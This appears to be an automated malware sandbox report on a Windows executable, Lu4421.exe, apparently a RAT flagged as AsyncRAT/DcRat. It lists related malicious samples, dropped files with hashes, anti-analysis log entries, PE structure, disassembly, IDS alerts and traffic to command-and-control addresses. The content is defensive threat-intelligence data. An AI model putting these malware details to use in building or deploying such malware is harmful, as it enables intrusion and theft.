3b5074b1b5d032e5620f69f9f700ff0e | http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32 | malicious | Unknown | 185.199.108.133, 20.233.83.145
3b5074b1b5d032e5620f69f9f700ff0e | Memo - Impairment Test 2023 MEX010B (5).js | malicious | Unknown | 185.199.108.133, 20.233.83.145
3b5074b1b5d032e5620f69f9f700ff0e | Awb 4586109146.bat.exe | malicious | AgentTesla, GuLoader | 185.199.108.133, 20.233.83.145
3b5074b1b5d032e5620f69f9f700ff0e | PO 0309494059506060609696007.exe | malicious | AgentTesla, GuLoader | 185.199.108.133, 20.233.83.145
3b5074b1b5d032e5620f69f9f700ff0e | urS3jQ9qb5.jar | malicious | Can Stealer | 185.199.108.133, 20.233.83.145
3b5074b1b5d032e5620f69f9f700ff0e | RFQ December-January Forcast and TCL.exe | malicious | GuLoader, MassLogger RAT | 185.199.108.133, 20.233.83.145
3b5074b1b5d032e5620f69f9f700ff0e | x0EMKX5G1g.exe | malicious | PureCrypter, PureLog Stealer | 185.199.108.133, 20.233.83.145
3b5074b1b5d032e5620f69f9f700ff0e | sldkjgsdGarDe3.bat | malicious | Abobus Obfuscator, Braodo | 185.199.108.133, 20.233.83.145
3b5074b1b5d032e5620f69f9f700ff0e | jhsdfggga13.bat | malicious | Abobus Obfuscator, Braodo | 185.199.108.133, 20.233.83.145
3b5074b1b5d032e5620f69f9f700ff0e | Garsdgwqa13de.bat | malicious | Abobus Obfuscator, Braodo | 185.199.108.133, 20.233.83.145
                                                                                No context
                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):65536
                                                                                Entropy (8bit):1.3165879074051308
                                                                                Encrypted:false
                                                                                SSDEEP:192:Sy3e+KIwO0ODr09G0HgtjAiorPGl9Lq9pzuiFIZ24lO8+:m+FwOR89G0HgtjToE9LozuiFIY4lO8+
                                                                                MD5:8C61DFBA68C87AF1CC40C905A6060F68
                                                                                SHA1:CD9D7D2C6F819E3F27DBB81216DC50FE1C9B2D98
                                                                                SHA-256:C3A1F13235131D5E59EFF70440E5260D0F5CDB11205ABE0B8CFF49C37BD19218
                                                                                SHA-512:8A4BAE9D43FF98412AC3B87635777836C7EE2413C4B9AF31D05CAFDB72024764D08F871F4F14E043D8921FCC0AB27F80F8255048A5EA2E41F8E27C8492838792
                                                                                Malicious:true
                                                                                Reputation:low
                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.9.3.6.4.7.6.9.1.0.2.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.9.3.6.4.9.1.9.1.0.1.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.c.5.a.1.3.b.d.-.6.1.1.2.-.4.d.f.9.-.a.e.0.6.-.7.4.9.1.d.7.f.b.b.f.4.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.9.b.d.0.6.3.-.5.9.5.2.-.4.2.b.a.-.8.1.9.3.-.4.1.7.2.7.0.8.c.7.b.c.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.L.u.4.4.2.1...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.s.t.u.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.0.-.0.0.0.1.-.0.0.1.4.-.9.d.4.9.-.6.f.0.0.3.d.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.8.2.7.c.9.8.c.8.c.9.9.3.e.9.2.1.3.7.2.1.7.d.0.2.e.c.5.b.3.9.b.0.0.0.0.0.0.0.0.!.0.0.0.0.a.1.1.4.c.0.5.9.f.e.d.0.8.a.5.0.1.c.3.4.4.f.4.0.d.9.f.7.0.2.f.0.3.c.d.e.b.b.a.b.!.L.u.4.4.2.1...e.x.e.....T.a.r.g.e.t.A.
                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                File Type:Mini DuMP crash report, 16 streams, Wed Dec 18 11:07:28 2024, 0x1205a4 type
                                                                                Category:dropped
                                                                                Size (bytes):938981
                                                                                Entropy (8bit):2.2810211413212906
                                                                                Encrypted:false
                                                                                SSDEEP:3072:zS4i9RbVMMPdh43+vm8cYzFYmt99L19+UGyxsaBl4M1/R/RVGs///AxcSe2x1CC/:O4ipVh43QDcYdUasaBl1dMfvq
                                                                                MD5:B339BA73D06AA5B8BDB0D91F98996A87
                                                                                SHA1:E85D190001EFF69287627299C339EABA879CDE19
                                                                                SHA-256:CB82751BBE20F590387F6C77AFC0B5ECB2AC193E2B6E6C3EA668D98EC82393E7
                                                                                SHA-512:D4ECE5C5A626799C42085729F77A0B723BD058621AD9549460DB2A6171E9E5DB8044741EDB8332F72FA011DDF9CD95CABB1861D0D96B5A8A226D9E24A859BDD3
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:MDMP..a..... ........bg............d...........$%..........$....5...........5......dY..fN..........l.......8...........T............s...............K..........|M..............................................................................eJ.......N......Lw......................T.......p....bg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):8814
                                                                                Entropy (8bit):3.700836325279667
                                                                                Encrypted:false
                                                                                SSDEEP:192:R6l7wVeJEDi6Y9LMkjsgmfZFzUyJprE89b9qb0f9tvnom:R6lXJwi6YhMYsgmfLzUy19qYf/t
                                                                                MD5:6F1CEE53AE6DE44F29C64CA473AED4E6
                                                                                SHA1:C2F0EA9B3976A6D7202F6CF4636931DC9D186A50
                                                                                SHA-256:E5B082EEA6E05BBFB70C58E2C39469AB194D4A3B9774176D2977DA7254D1CD3B
                                                                                SHA-512:0A8D444102DEC4526002472CD1036C460B84FD8A1869C0DE12C2CF2488392A327E281785B9FB40D21CC220F1E1910D6A49A8A86813EA5A6754C46D675D40D49A
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.6.8.<./.P.i.
                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):4782
                                                                                Entropy (8bit):4.454922366753696
                                                                                Encrypted:false
                                                                                SSDEEP:48:cvIwWl8zs4Jg771I9MXWpW8VYaYm8M4JCV6NPzyF0yq8vk6NPz11twU+ed:uIjf+I7Hm7VCJ5ZrW9ZJ1twUld
                                                                                MD5:9C4801D4A2C64E862CFD4D4043A99C66
                                                                                SHA1:223C18547016789C769B53496931A5188A13D614
                                                                                SHA-256:B80212A8115399C32CF336524B5DC337DF881E64EEB1354B8D9CA0C1F70A0029
                                                                                SHA-512:1E203382F02C0B9E2DD141B91CDB8466B06695917C5491769AAA590904A692D0DE6DD0248ACEEBD6484708CDA7CE9EABE05E1F6EBE4458343B19033814E136FB
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636610" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                Category:dropped
                                                                                Size (bytes):71954
                                                                                Entropy (8bit):7.996617769952133
                                                                                Encrypted:true
                                                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):328
                                                                                Entropy (8bit):3.2418003062782916
                                                                                Encrypted:false
                                                                                SSDEEP:6:kK/8i9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:XMDImsLNkPlE99SNxAhUe/3
                                                                                MD5:7D4978EF9044BBE1214404E544BA9690
                                                                                SHA1:AA55A666AD0F53C537EDA72FF18DBB769BDE65CF
                                                                                SHA-256:C1DC771F0C46622028015053F737C9253E09987A7CD3441693299DFBAEC8AC6D
                                                                                SHA-512:00F6E139C91F90616F8B61B8DC1901FE432E50F0CCBB78BCDCA690BED05BC5EAF04181EB2E1DFC8562045861236D265DDF68647A0440BD4B2AF88134090F7B38
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:p...... ..........V.=Q..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                Process:C:\Users\user\Desktop\Lu4421.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):802
                                                                                Entropy (8bit):5.148231617209204
                                                                                Encrypted:false
                                                                                SSDEEP:12:oVRAF42pFDo+fTU29DmS7a3pa7/XhauWhakzXLhaZQhaW80A0Iu0j:oVmF4q6+fbdyGPHWpbgQW0A0IV
                                                                                MD5:2C667ACDF644153E839FF081C0A35066
                                                                                SHA1:27B633F592F18EC7693A9A919718E74E93F0196D
                                                                                SHA-256:7D969B74084B176757C20B95F2B5ACC279E450C9A5AF8F25D38EF835CA2C9AEA
                                                                                SHA-512:A4C9E37DB43DAA5364876A74A18C23EAF3F1FEAB5212EBC01F813425B89D162DF9CE0DF4D92DC3EEC2D42FF07A89168C07FAF42D1F0B1F8ADA1FAC223AA4E895
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:[2024-12-18 06:07:19.324] HideFile : Adding 'hidden' attribute to file C:\Users\user\AppData\Local\267bb600791eee4c354dd856956b4399..[2024-12-18 06:09:48.289] AntiAnalysis: Successfully loaded 'PCNames' list with 230 entries...[2024-12-18 06:09:48.304] AntiAnalysis: Successfully loaded 'PCUsernames' list with 143 entries...[2024-12-18 06:09:55.845] AntiAnalysis: Successfully loaded 'MachineGuids' list with 30 entries...[2024-12-18 06:09:55.845] AntiAnalysis: Successfully loaded 'GPUs' list with 99 entries...[2024-12-18 06:09:55.845] AntiAnalysis: Successfully loaded 'IPs' list with 203 entries...[2024-12-18 06:09:55.845] AntiAnalysis: Successfully loaded 'Processes' list with 2 entries...[2024-12-18 06:20:01.395] AntiAnalysis: Failed to check IP addresses. Exception: No such host is known..
                                                                                Process:C:\Users\user\Desktop\Lu4421.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:modified
                                                                                Size (bytes):65024
                                                                                Entropy (8bit):5.818068016613434
                                                                                Encrypted:false
                                                                                SSDEEP:1536:ihbjnR1AioCzmUxIxqFaUm7wPeUJyq8wJGbbUwm/GMNpqKmY7:ihbjnR1AioCzmUxIxwaTwPeUw8GbbUxM
                                                                                MD5:67CA41C73D556CC4CFC67FC5B425BBBD
                                                                                SHA1:ADA7F812CD581C493630ECA83BF38C0F8B32B186
                                                                                SHA-256:23D2E491A8C7F2F7F344764E6879D9566C9A3E55A3788038E48B346C068DDE5B
                                                                                SHA-512:0DCEB6468147CD2497ADF31843389A78460ED5ABE2C5A13488FC55A2D202EE6CE0271821D3CF12BC1F09A4D6B79A737EA3BCCFC2BB87F89B3FFF6410FA85EC02
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 84%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:.>g................................. ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........e..............................................................W......H3.......W......3........./.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(C......*2~.....oD...*.s....%rW..po....(h...r...p(....o....o....o....( ... ....(....*.s....%rW..po....r9..po....%r9..po.....o....o....( ...*Vs.........si........*.~"...*..."...*F.(+...~!...o....*&...o.
                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                Category:dropped
                                                                                Size (bytes):1835008
                                                                                Entropy (8bit):4.465566144997875
                                                                                Encrypted:false
                                                                                SSDEEP:6144:/IXfpi67eLPU9skLmb0b4jWSPKaJG8nAgejZMMhA2gX4WABl0uNydwBCswSbw:wXD94jWlLZMM6YFH4+w
                                                                                MD5:68E18F01120AFA1DE2969D61023B8374
                                                                                SHA1:8AD64F032F9F51303760256139B8F8633F1F4B26
                                                                                SHA-256:AE7493DA4C6A4544CAA18A1944E6A949BCD74B239102B2493FC7E613A1794E2F
                                                                                SHA-512:36600DB197070E68267A7D31A3985BB6C5BA2A98A83A02E59A4C860C110A1BD4EE586D40325F6E20CCA07EDDF02C82D0534F1D4542C77FA5A79E4C19F83C18F5
                                                                                Malicious:false
                                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmZC..=Q.................................................................................................................................................................................................................................................................................................................................................2........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                Entropy (8bit):7.973829401437202
                                                                                TrID:
                                                                                • Win64 Executable GUI Net Framework (217006/5) 47.53%
                                                                                • Win64 Executable GUI (202006/5) 44.25%
                                                                                • Win64 Executable (generic) Net Framework (21505/4) 4.71%
                                                                                • Win64 Executable (generic) (12005/4) 2.63%
                                                                                • Generic Win/DOS Executable (2004/3) 0.44%
                                                                                File name:Lu4421.exe
                                                                                File size:5'865'472 bytes
                                                                                MD5:e5358fca58c0e1b1e29eb195fb0f4675
                                                                                SHA1:a114c059fed08a501c344f40d9f702f03cdebbab
                                                                                SHA256:220c04c30a7dbd084fdebe00102f6340194845d8664dfd669a5549f23a1031c4
                                                                                SHA512:f072704ad3ffe2ad975972453f1a58fe3ccd4061ef275e833e60b593e79e65e9955fe841e7248002046e4c35472bbc9c946457f9608fe10c92fa07a9747ea8f3
                                                                                SSDEEP:98304:xkqXf0FlL9nrYAWAZi6sfLxkuahjCOeX9YG9see5GnRyCAm0makxH13r7INfWdpe:xkSIlLtzWAXAkuujCPX9YG9he5GnQCAe
                                                                                TLSH:3146331473F5069AF1FB6BB4E97141119E36BA07C077EA4C1958109C0EB3789AD22FBB
                                                                                File Content Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0..*9..........`... ....@...... ...............................=Z...`...@......@............... .....
                                                                                Icon Hash:90cececece8e8eb0
                                                                                Entrypoint:0xd26000
                                                                                Entrypoint Section:.taggant
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE
                                                                                Time Stamp:0xFFBE84BF [Sat Dec 19 14:25:03 2105 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:dc12932426806b6b47a373d7ae42c21d
                                                                                Instruction
                                                                                jmp 00007F5E1D07AE1Ah
                                                                                divps xmm3, dqword ptr [ecx+00h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                jmp 00007F5E1D07CE15h
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [edx], bh
                                                                                add al, byte ptr [eax]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [ecx], al
                                                                                add byte ptr [eax], 00000000h
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                jnle 00007F5E1D07AD92h
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                iretd
                                                                                add dword ptr [eax], eax
add byte ptr [eax], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x398085 | 0xad | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x396000 | 0x53c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x2000 | 0x394000 | 0x394000 | ceec5083f285b2c1be8d061a39f91e2c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x396000 | 0x53c | 0x400 | fb14019a6944b144187ed32a35b67085 | False | 0.6904296875 | data | 5.659166984958865 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x398000 | 0x2000 | 0x200 | f556b29b2c3bed37b6a24754dd07217a | False | 0.166015625 | data | 1.1919459888330979 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x39a000 | 0x38a000 | 0x200 | 7c37b2d3bde84d00b50b7fc7d29ad5fd | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
iubcysyr | 0x724000 | 0x200000 | 0x1ff400 | 5307be4cfcf1ab435746dd4c576b558c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tpxtcrvz | 0x924000 | 0x2000 | 0x200 | ff4192a5c1ad550f8e65ea3f3799fbc4 | False | 0.587890625 | data | 4.534819229507492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x926000 | 0x4000 | 0x2200 | 96c9148d88dec28e0da1788ac9c5c22a | False | 0.07192095588235294 | DOS executable (COM) | 0.9116417289365074 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x922dd8 | 0x348 | data | | | 0.43214285714285716
RT_MANIFEST | 0x923120 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T12:07:27.709803+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49737 | 185.199.108.133 | 443 | TCP
2024-12-18T12:07:32.534040+0100 | 2842478 | ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) | 1 | 51.89.44.68 | 8848 | 192.168.2.4 | 49739 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 12:07:21.132110119 CET | 49730 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:21.132141113 CET | 443 | 49730 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:21.132200956 CET | 49730 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:21.140517950 CET | 49734 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:21.140566111 CET | 443 | 49734 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:21.140624046 CET | 49734 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:21.140845060 CET | 49735 | 443 | 192.168.2.4 | 185.199.108.133
Dec 18, 2024 12:07:21.140858889 CET | 443 | 49735 | 185.199.108.133 | 192.168.2.4
Dec 18, 2024 12:07:21.140906096 CET | 49735 | 443 | 192.168.2.4 | 185.199.108.133
